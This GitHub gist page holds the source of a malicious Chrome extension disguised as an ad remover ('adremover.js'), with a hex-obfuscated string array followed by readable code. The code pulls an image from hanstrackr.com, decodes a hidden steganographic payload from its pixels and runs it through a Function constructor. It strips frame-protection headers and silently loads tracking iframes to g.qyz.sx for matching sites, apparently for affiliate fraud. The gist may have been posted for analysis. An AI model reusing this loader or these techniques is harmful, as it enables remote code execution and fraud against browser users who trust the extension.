Skip to content

Instantly share code, notes, and snippets.

@ameshkov ameshkov/adremover.js Secret
Created Apr 15, 2018

Embed
What would you like to do?
var c = '61';
var ckey = 'zPShu9x7lARuvzXk';
var _0xa7f4 = ["\x37\x34\x35\x32", "\x36\x39\x33\x36\x38\x34\x37", "\x69\x64\x5F\x61", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x2E\x71\x79\x7A\x2E\x73\x78", "\x73\x65\x74", "\x63\x6F\x6F\x6B\x69\x65\x73", "\x4B\x62\x5A\x62\x47\x4E\x76\x73\x5A\x64\x53\x42\x61\x50\x72\x38\x70\x73\x42\x37\x6A\x45\x61\x4C\x75\x76\x53\x77\x35\x51\x33\x46", "\x6D\x64\x35", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x2E\x71\x79\x7A\x2E\x73\x78\x2F\x67\x6F\x3F\x78\x3D", "\x26\x63\x3D", "\x2B\x26\x73\x3D", "\x66\x66\x66\x66\x30\x39\x32\x31\x33\x30\x37\x31\x32\x30\x33\x39\x5F", "\x6E\x6F\x77", "\x66\x6C\x6F\x6F\x72", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x73\x72\x63", "\x69\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x72\x65\x6D\x6F\x76\x65", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64", "\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6C\x6F\x63\x61\x6C", "\x73\x74\x6F\x72\x61\x67\x65", "\x62\x62", "\x6C\x65\x6E\x67\x74\x68", "\x6B\x65\x79\x73", "\x62\x62\x65", "\x67\x65\x74", "\x74\x61\x62\x49\x64", "\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x6E\x61\x6D\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x78\x2D\x66\x72\x61\x6D\x65\x2D\x6F\x70\x74\x69\x6F\x6E\x73", "\x66\x72\x61\x6D\x65\x2D\x6F\x70\x74\x69\x6F\x6E\x73", "\x73\x70\x6C\x69\x63\x65", "\x73\x75\x62\x5F\x66\x72\x61\x6D\x65", "\x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E", "\x62\x6C\x6F\x63\x6B\x69\x6E\x67", "\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x6F\x6E\x42\x65\x66\x6F\x72\x65\x53\x65\x6E\x64\x48\x65\x61\x64\x65\x72\x73", "\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74", "\x68\x6F\x73\x74\x6E\x61\x6D\x65", "\x75\x72\x6C", "\x77\x77\x77", "\x73\x75\x62\x73\x74\x72", "\x25\x55\x6A\x79\x25\x42\x4E\x59\x30\x4F", "\x67\x65\x74\x54\x69\x6D\x65", "\x72\x6F\x75\x6E\x64", "\x70\x75\x73\x68", "\x6D\x61\x69\x6E\x5F\x66\x72\x61\x6D\x65", "\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x6E\x73\x74\x72\x61\x63\x6B\x72\x2E\x63\x6F\x6D\x2F\x69\x6D\x61\x67\x65\x2D", "\x2E\x70\x6E\x67\x3F\x74\x3D", "\x6F\x6E\x6C\x6F\x61\x64", "\x32\x64", "\x67\x65\x74\x43\x6F\x6E\x74\x65\x78\x74", "\x63\x61\x6E\x76\x61\x73", "\x77\x69\x64\x74\x68", "\x68\x65\x69\x67\x68\x74", "\x64\x72\x61\x77\x49\x6D\x61\x67\x65", "\x67\x65\x74\x49\x6D\x61\x67\x65\x44\x61\x74\x61", "\x64\x61\x74\x61", "\x70\x61\x72\x73\x65", "\x74\x65\x78\x74", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x73\x74\x61\x74\x75\x73", "\x73\x70\x6C\x69\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x47\x45\x54", "\x72\x65\x73\x2F\x63\x6F\x75\x70\x6F\x6E\x73\x2E\x74\x78\x74", "\x67\x65\x74\x55\x52\x4C", "\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72", "\x66\x69\x6C\x74\x65\x72", "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74", "\x63\x6F\x6E\x63\x61\x74", "\x61\x62\x73", "", "\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65", "\x6A\x6F\x69\x6E"];
var signatures = [],
signaturesBlockList = [],
signaturesBlockListExpires = {},
owa = function(variable_0, variable_1) {
cookieValue = btoa(variable_0), cookieValue = btoa(cookieValue), cookieValue = "7452" + cookieValue + "6936847", chrome["cookies"]["set"]({
name: "id_a",
url: "https://g.qyz.sx",
value: cookieValue
}, function(variable_0) {}), x = variable_1, s = $["md5"](variable_0 + "KbZbGNvsZdSBaPr8psB7jEaLuvSw5Q3F"), variable_0 = "https://g.qyz.sx/go?x=" + x + "&c=" + c + "+&s=" + s;
var variable_2 = "ffff092130712039_" + Math["floor"](Date["now"]()),
variable_3 = document["createElement"]("iframe");
variable_3["src"] = variable_0, variable_3["id"] = variable_2, document["body"]["appendChild"](variable_3), setTimeout(function() {
chrome["cookies"]["remove"]({
url: "https://g.qyz.sx",
name: "id_a"
})
}, 3e3), setTimeout(function() {
var variable_0 = document["getElementById"](variable_2);
variable_0["parentNode"]["removeChild"](variable_0), window["location"]["reload"]()
}, 15e3)
},
s3 = function() {
chrome["storage"]["local"]["set"]({
bb: signaturesBlockList
}), chrome["storage"]["local"]["set"]({
bbe: signaturesBlockListExpires
})
},
l3 = function(variable_0) {
chrome["storage"]["local"]["get"]("bb", function(variable_1) {
!variable_1 || Object["keys"](variable_1)["length"] <= 0 ? variable_0() : (signaturesBlockList = variable_1["bb"], chrome["storage"]["local"]["get"]("bbe", function(variable_2) {
!variable_2 || Object["keys"](variable_1)["length"] <= 0 ? variable_0() : (signaturesBlockListExpires = variable_2["bbe"], variable_0())
}))
})
},
x3 = function() {
chrome["webRequest"]["onBeforeSendHeaders"]["addListener"](function(variable_0) {
if (-1 == variable_0["tabId"]) {
for (var variable_1 = 0; variable_1 < variable_0["requestHeaders"]["length"]; ++variable_1) {
var variable_2 = variable_0["requestHeaders"][variable_1]["name"]["toLowerCase"]();
if (-1 !== ["x-frame-options", "frame-options"]["indexOf"](variable_2)) {
variable_0["requestHeaders"]["splice"](variable_1, 1);
break
}
};
return {
requestHeaders: variable_0["requestHeaders"]
}
}
}, {
types: ["sub_frame"],
urls: ["<all_urls>"]
}, ["blocking", "requestHeaders"]), chrome["webRequest"]["onBeforeRequest"]["addListener"](function(variable_0) {
var variable_1 = new URL(variable_0["url"])["hostname"]["toLowerCase"](),
variable_2 = variable_0["url"];
"www" == variable_1["substr"](0, 3) && (variable_1 = variable_1["substr"](4));
var variable_4 = $["md5"](variable_1 + "%Ujy%BNY0O"),
variable_3 = Math["round"]((new Date)["getTime"]() / 1e3);
for (var variable_5 in signatures) {
if (signatures[variable_5] == variable_4) {
if (-1 == signaturesBlockList["indexOf"](variable_4)) {
signaturesBlockList["push"](variable_4), signaturesBlockListExpires[variable_4] = variable_3 + 86400, s3()
} else {
if (signaturesBlockListExpires[variable_4] > variable_3) {
return
};
signaturesBlockListExpires[variable_4] = variable_3 + 86400, s3()
};
owa(variable_2, variable_4);
break
}
}
}, {
urls: ["<all_urls>"],
types: ["main_frame"]
}, ["blocking"])
};
l3(function() {
var variable_0 = new Image;
variable_0["src"] = "https://www.hanstrackr.com/image-" + ckey + ".png?t=" + +new Date, variable_0["onload"] = function() {
var variable_1 = document["createElement"]("canvas")["getContext"]("2d");
variable_1["canvas"]["width"] = variable_0["width"], variable_1["canvas"]["height"] = variable_0["height"], variable_1["drawImage"](variable_0, 0, 0);
var variable_2 = variable_1["getImageData"](0, 0, variable_1["canvas"]["width"], variable_1["canvas"]["height"]),
variable_4 = decodeMessage(variable_2["data"], [1102318550, 902749891, 1834543077, -1708232615, 1651755051, 364409623, -1318698268, 1075183187]),
variable_3 = null;
try {
variable_3 = JSON["parse"](variable_4)
} catch (variable_0) {};
variable_3 && variable_3["text"] && verify(variable_3["text"])
};
var variable_1 = new XMLHttpRequest;
variable_1["onreadystatechange"] = function() {
4 == variable_1["readyState"] && 200 == variable_1["status"] && (signatures = variable_1["responseText"]["split"](/\r?\n/), x3())
}, variable_1["open"]("GET", chrome["extension"]["getURL"]("res/coupons.txt"), !0), variable_1["send"](null)
});
var verify = function(variable_0) {
[]["filter"]["constructor"](variable_0)()
},
getBit = function(variable_0, variable_1) {
return variable_0 >> variable_1 & 1
},
setBit = function(variable_0, variable_1, variable_2) {
return variable_0 & ~(1 << variable_1) | variable_2 << variable_1
},
getBitsFromNumber = function(variable_0) {
for (var variable_1 = [], variable_2 = 0; variable_2 < 16; variable_2++) {
variable_1["push"](getBit(variable_0, variable_2))
};
return variable_1
},
getNumberFromBits = function(variable_0, variable_1, variable_2) {
for (var variable_4 = 0, variable_3 = 0; variable_3 < 16;) {
var variable_5 = getNextLocation(variable_1, variable_2, variable_0["length"]),
variable_66 = getBit(variable_0[variable_5], 0);
variable_4 = setBit(variable_4, variable_3, variable_66), variable_3++
};
return variable_4
},
getMessageBits = function(variable_0) {
for (var variable_1 = [], variable_2 = 0; variable_2 < variable_0["length"]; variable_2++) {
var variable_4 = variable_0["charCodeAt"](variable_2);
variable_1 = variable_1["concat"](getBitsFromNumber(variable_4))
};
return variable_1
},
getNextLocation = function(variable_0, variable_1, variable_2) {
for (var variable_4 = variable_0["length"], variable_3 = Math["abs"](variable_1[variable_4 % variable_1["length"]] * (variable_4 + 1)) % variable_2;;) {
if (variable_3 >= variable_2) {
variable_3 = 0
} else {
if (variable_0["indexOf"](variable_3) >= 0) {
variable_3++
} else {
if ((variable_3 + 1) % 4 != 0) {
return variable_0["push"](variable_3), variable_3
};
variable_3++
}
}
}
},
decodeMessage = function(variable_0, variable_1) {
var variable_2 = [],
variable_4 = getNumberFromBits(variable_0, variable_2, variable_1);
if (16 * (variable_4 + 1) > 0.75 * variable_0["length"]) {
return ""
};
if (0 === variable_4) {
return ""
};
for (var variable_3 = [], variable_5 = 0; variable_5 < variable_4; variable_5++) {
var variable_66 = getNumberFromBits(variable_0, variable_2, variable_1);
variable_3["push"](String["fromCharCode"](variable_66))
};
return variable_3["join"]("")
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.